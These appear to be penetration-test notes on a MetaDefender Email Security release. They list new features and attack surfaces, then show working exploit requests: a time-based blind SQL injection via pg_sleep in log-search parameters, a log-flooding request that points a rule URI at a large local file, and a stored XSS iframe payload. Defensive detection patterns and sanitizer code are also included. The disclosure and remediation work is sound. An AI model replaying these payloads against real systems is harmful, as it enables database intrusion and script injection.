New Features from 5.7.5
- Since version 6.0.0: part of the database has been migrated from SQLite to PostgreSQL.
- On-arrival URL reputation check: integrates with MetaDefender Cloud to check the reputation of the URLs found in the email body.
- Scan results from MD Core can be attached to the email.
- Skip MFT supervisor approval
- Add trusted senders from the FROM header.
- Header filters: allow filtering on email headers such as From, To and Subject.
- SMTP rewrite: allows rewriting the domain of MAIL FROM or RCPT TO when an email is sent to the SMTP relay, so that it can be routed to alternative domains.
- Login banner: allows a custom login banner.
- SMTP connection control: limits connections to the SMTP server.
- Rule wide header support: allows adding custom headers to an email when it is processed by a given rule.
- Enhanced Quarantine rescan page rebranding: a UI tool to customize the Quarantine rescan page.
- Core workflows for each email component: allows using different MD Core workflows to process each part of an email (headers, bodies, attachments).
- SMTP multi-delivery: allows delivering one email to multiple SMTP servers.
- Rewrite email addresses in email headers: rewrites the email addresses in an email's headers.
Attack Surfaces
- Recipient domain or address filter (RCPT TO): possibly ReDoS, by creating a vulnerable rule and sending an email with a malicious recipient domain.
- Display email body on the rescan page: XSS?
- Upload attachments to MetaDefender Managed File Transfer: archive vulnerabilities.
Blind SQL Injection
GET /stat/log/history?first=0&size=50&search_term=insomnia)')%20or%20(select%20true%20from%20pg_sleep(5))%3b-- HTTP/1.1
apikey: c4c8e7dbd65f496b9e9d691d3f0b709b
Referer: http://localhost:8058/
Cookie: session_id_mdemailsecurity=c4c8e7dbd65f496b9e9d691d3f0b709b
GET /stat/log/rejected?first=0&size=50&search_term=insomnia)')%20or%20(select%20true%20from%20pg_sleep(5))%3b-- HTTP/1.1
apikey: c4c8e7dbd65f496b9e9d691d3f0b709b
Referer: http://localhost:8058/
Cookie: session_id_mdemailsecurity=c4c8e7dbd65f496b9e9d691d3f0b709b
GET /stat/log/history?first=0&size=50&status=)')%20or%20(select%20true%20from%20pg_sleep(5))%3b-- HTTP/1.1
apikey: c4c8e7dbd65f496b9e9d691d3f0b709b
Referer: http://localhost:8058/
Cookie: session_id_mdemailsecurity=c4c8e7dbd65f496b9e9d691d3f0b709b
Decoded payload: insomnia)') or (select true from pg_sleep(5));--
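Added example (not part of the original notes or of the product's code): a log-review heuristic that URL-decodes the search_term and status parameters of request lines like the ones above and flags SQL injection markers. The patterns and the sample request lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters of the /stat/log/* endpoints that carried the payload in the notes.
WATCHED_PARAMS = {"search_term", "status"}

# Constructed heuristics, evaluated on the URL-decoded parameter value.
SUSPICIOUS = [
    ("time-delay function", re.compile(r"\b(pg_sleep|waitfor\s+delay|benchmark)\b", re.I)),
    ("statement terminator + comment", re.compile(r";\s*(--|/\*)")),
    ("quote break-out + boolean", re.compile(r"'\s*\)*\s*\b(or|and)\b", re.I)),
    ("subquery", re.compile(r"\(\s*select\b", re.I)),
]

# Constructed sample request lines (the first three mirror the shapes shown above).
SAMPLE_REQUEST_LINES = [
    "GET /stat/log/history?first=0&size=50&search_term=insomnia)')%20or%20(select%20true%20from%20pg_sleep(5))%3b-- HTTP/1.1",
    "GET /stat/log/rejected?first=0&size=50&search_term=insomnia)')%20or%20(select%20true%20from%20pg_sleep(5))%3b-- HTTP/1.1",
    "GET /stat/log/history?first=0&size=50&status=)')%20or%20(select%20true%20from%20pg_sleep(5))%3b-- HTTP/1.1",
    "GET /stat/log/history?first=0&size=50&search_term=O'Brien%20and%20sons HTTP/1.1",
    "GET /stat/log/history?first=0&size=50&status=blocked HTTP/1.1",
]

def inspect_request_line(line):
    """Return [(path, param, [reasons])] for one 'METHOD target HTTP/x' line."""
    parts = line.split(" ")
    if len(parts) < 3:
        return []          # not a request line
    target = urlsplit(parts[1])
    findings = []
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name not in WATCHED_PARAMS:
            continue
        reasons = [label for label, rx in SUSPICIOUS if rx.search(value)]
        if reasons:
            findings.append((target.path, name, reasons))
    return findings

def scan(lines):
    """Flatten the findings for a batch of request lines."""
    return [f for line in lines for f in inspect_request_line(line)]

if __name__ == "__main__":
    for path, param, reasons in scan(SAMPLE_REQUEST_LINES):
        print(f"{path} {param}: {', '.join(reasons)}")
```

The heuristic only helps triage existing logs; the fix on the server side is to bind search_term and status as query parameters instead of concatenating them into the SQL text.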
Log Spam
POST /remotecorerules HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.8,vi-VN;q=0.5,vi;q=0.3
Content-Type: application/json
apikey: c4c8e7dbd65f496b9e9d691d3f0b709b
Origin: http://localhost:8058
Referer: http://localhost:8058/
Cookie: session_id_mdemailsecurity=c4c8e7dbd65f496b9e9d691d3f0b709b
{"uri":"file://localhost/C:/Windows/servicing/Sessions/Sessions.xml#"}
The file C:/Windows/servicing/Sessions/Sessions.xml is about 700MB in size, so sending this request repeatedly makes the log file balloon.
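Added example (not the product's code): two mitigations for the behaviour above, rejecting any "uri" value that is not a plain HTTP(S) URL and capping how much fetched data a single log entry can carry. The function names, the allowed schemes and the 2048-byte cap are assumptions.

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https", "http"}  # assumption: remote Core rules are fetched over HTTP(S)
MAX_LOGGED_BYTES = 2048              # assumption: per-entry cap for logged response data

def validate_remote_core_uri(uri):
    """Return (ok, reason). Hypothetical check applied before the server touches the URI."""
    try:
        parts = urlsplit(uri)
        _ = parts.port               # raises ValueError on a malformed port
    except ValueError as exc:
        return False, f"unparseable URI: {exc}"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme '{parts.scheme}' not allowed"
    if not parts.hostname:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "userinfo not allowed"
    return True, "ok"

def log_excerpt(body, limit=MAX_LOGGED_BYTES):
    """Bounded text form of fetched bytes, so one request cannot grow the log without limit."""
    head = body[:limit].decode("utf-8", errors="replace")
    if len(body) > limit:
        return f"{head}... [truncated, {len(body)} bytes total]"
    return head

if __name__ == "__main__":
    # The URI from the request above, then a constructed acceptable one.
    print(validate_remote_core_uri("file://localhost/C:/Windows/servicing/Sessions/Sessions.xml#"))
    print(validate_remote_core_uri("https://core.example.internal:8008/rules"))
    print(len(log_excerpt(b"A" * 1_000_000)))
```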
Stored XSS
Edit the rebranding page:
POST /admin/config/rebranding/rescan HTTP/1.1
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.8,vi-VN;q=0.5,vi;q=0.3
Content-Type: application/json
apikey: c4c8e7dbd65f496b9e9d691d3f0b709b
Origin: http://localhost:8058
Referer: http://localhost:8058/
Cookie: session_id_mdemailsecurity=c4c8e7dbd65f496b9e9d691d3f0b709b
Priority: u=0
{
"en-US" : {
"footer" : "\n\t\t\t\t\t<div style=\"display:flex; flex-direction: row-reverse; gap: 2.5rem;\">\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/policies/terms-of-service\" target=\"_blank\" rel=\"noopener\">Terms</a>\n\t\t\t\t\t\t<a href=\"https://www.opswat.com/support/contact-support\" target=\"_blank\" rel=\"noopener\">Support</a>\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/policies/privacy-policy\" target=\"_blank\" rel=\"noopener\">Privacy policy</a>\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/mdemail\" target=\"_blank\" rel=\"noopener\">Help center</a>\n\t\t\t\t\t</div>\n\t\t\t\t",
"actions.description" : "Please select an action to execute on your quarantined email. <iframe/onload=alert(1337)>"
},
"en-GB" : {
"footer" : "\n\t\t\t\t\t<div style=\"display:flex; flex-direction: row-reverse; gap: 2.5rem;\">\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/policies/terms-of-service\" target=\"_blank\" rel=\"noopener\">Terms</a>\n\t\t\t\t\t\t<a href=\"https://www.opswat.com/support/contact-support\" target=\"_blank\" rel=\"noopener\">Support</a>\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/policies/privacy-policy\" target=\"_blank\" rel=\"noopener\">Privacy policy</a>\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/mdemail\" target=\"_blank\" rel=\"noopener\">Help center</a>\n\t\t\t\t\t</div>\n\t\t\t\t"
},
"ja-JP" : {
"footer" : "\n\t\t\t\t\t<div style=\"display:flex; flex-direction: row-reverse; gap: 2.5rem;\">\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/policies/terms-of-service\" target=\"_blank\" rel=\"noopener\">利用規約</a>\n\t\t\t\t\t\t<a href=\"https://www.opswat.com/support/contact-support\" target=\"_blank\" rel=\"noopener\">サポート</a>\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/policies/privacy-policy\" target=\"_blank\" rel=\"noopener\">プライバシーポリシー</a>\n\t\t\t\t\t\t<a href=\"https://docs.opswat.com/mdemail\" target=\"_blank\" rel=\"noopener\">ヘルプセンター</a>\n\t\t\t\t\t</div>\n\t\t\t\t",
"actions.title" : "行動する",
"actions.description" : "隔離された電子メールに対して実行するアクションを選択してください。"
}
}
The actions.description field contains the payload <iframe/onload=alert(1337)>, which is rendered by the Summernote library, which has an XSS vulnerability.
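Added example (not the product's code): a server-side allow-list sanitizer for the rebranding fields, applied before they are stored, so that only the markup used by the default footer survives. The function name and the allowed tag and attribute sets are assumptions.

```python
from html import escape
from html.parser import HTMLParser

# Assumption: rebranding fields only need the markup seen in the default footer.
ALLOWED = {"div": {"style"}, "a": {"href", "target", "rel"}, "br": set(), "b": set(), "i": set()}
VOID = {"br"}
SAFE_URL_PREFIXES = ("https://", "http://", "mailto:")

class _AllowListSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return                      # drops <iframe>, <script>, <svg>, ...
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED[tag]:
                continue                # drops every on* event handler
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                continue                # drops javascript: and data: URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))   # text is always re-escaped

def sanitize_rebranding_html(fragment):
    """Return the fragment with every tag and attribute outside ALLOWED removed."""
    parser = _AllowListSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)

if __name__ == "__main__":
    # The actions.description value from the request above.
    print(sanitize_rebranding_html(
        "Please select an action to execute on your quarantined email. <iframe/onload=alert(1337)>"))
```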
Broken Features
- Generate contact support package
Still not Fixed
- https://opswat.atlassian.net/wiki/spaces/SES/pages/3563553462/MetaDefender+Email+Security+Pentest+Report+-+2024.11#2.9-Sensitive-Data-Disclosure-in-Audit-Log
- https://opswat.atlassian.net/wiki/spaces/SES/pages/3563553462/MetaDefender+Email+Security+Pentest+Report+-+2024.11#2.4-Stored-XSS-(Cross-Site-Scripting)